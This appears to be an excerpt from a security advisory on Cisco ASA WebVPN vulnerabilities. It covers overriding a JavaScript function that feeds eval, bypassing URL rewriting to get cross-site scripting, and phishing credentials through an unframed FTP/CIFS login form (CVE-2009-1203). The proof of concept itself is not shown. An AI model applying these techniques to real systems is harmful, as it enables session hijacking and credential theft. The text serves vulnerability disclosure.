For example, the "csco_wrap_js" JavaScript function in /+CSCOL+/cte.js makes a call to a function referenced by "CSCO_WebVPN['process']".
The result of this call is then used in an "eval" statement.
function csco_wrap_js(str)
{
var ret="<script id=CSCO_GHOST src="+CSCO_Gateway+
"/+CSCOL+/cte.js></scr"+
"ipt><script id=CSCO_GHOST src="+
CSCO_Gateway+"/+CSCOE+/apcf></sc"+"ript>";
var js_mangled=CSCO_WebVPN['process']('js',str);
ret+=CSCO_WebVPN['process']('html',eval(js_mangled));
return ret;
};
To exploit this behavior, a malicious page can rewrite "CSCO_WebVPN['process']" with an attacker-defined function that will return an arbitrary value. The next time the "csco_wrap_js" function is called, the malicious code will be executed. Below is a proof of concept.
When a webpage is requested through the ASA's Web VPN, the targeted scheme and hostname is Rot13-encoded, then hex-encoded and placed in the ASA's URL. For example, "http://www.trustwave.com" is accessed by requesting the following ASA path:
However, if the request URL is modified to change the initial hex value of "00" to "01", the HTML document is returned without any rewriting. This allows the pages scriptable content to run in the ASA's DOM, making Cross-Site Scripting trivial.
Authentication Credential Theft (CVE-2009-1203):
When a user accesses an FTP or CIFS destination using the Web VPN, the resulting URL is formatted in a similar manner as the web requests described above. The following URL attempts to connect to ftp.example.com; normally, it would be in an HTML frame within the Web VPN website.
The ASA first attempts to connect to the FTP server or CIFS share using anonymous credentials. If those fail, the user is prompted for login credentials. When viewed on its own (outside of a frame), the submission form gives no indication what it is for and is very similar in appearance to the Web VPN's primary login page. If the URL was sent to a user by an attacker, it is very possible that a user would assume that he needs to resubmit credentials to the Web VPN.
The ASA would then forward the credentials to the attacker's FTP or CIFS server.
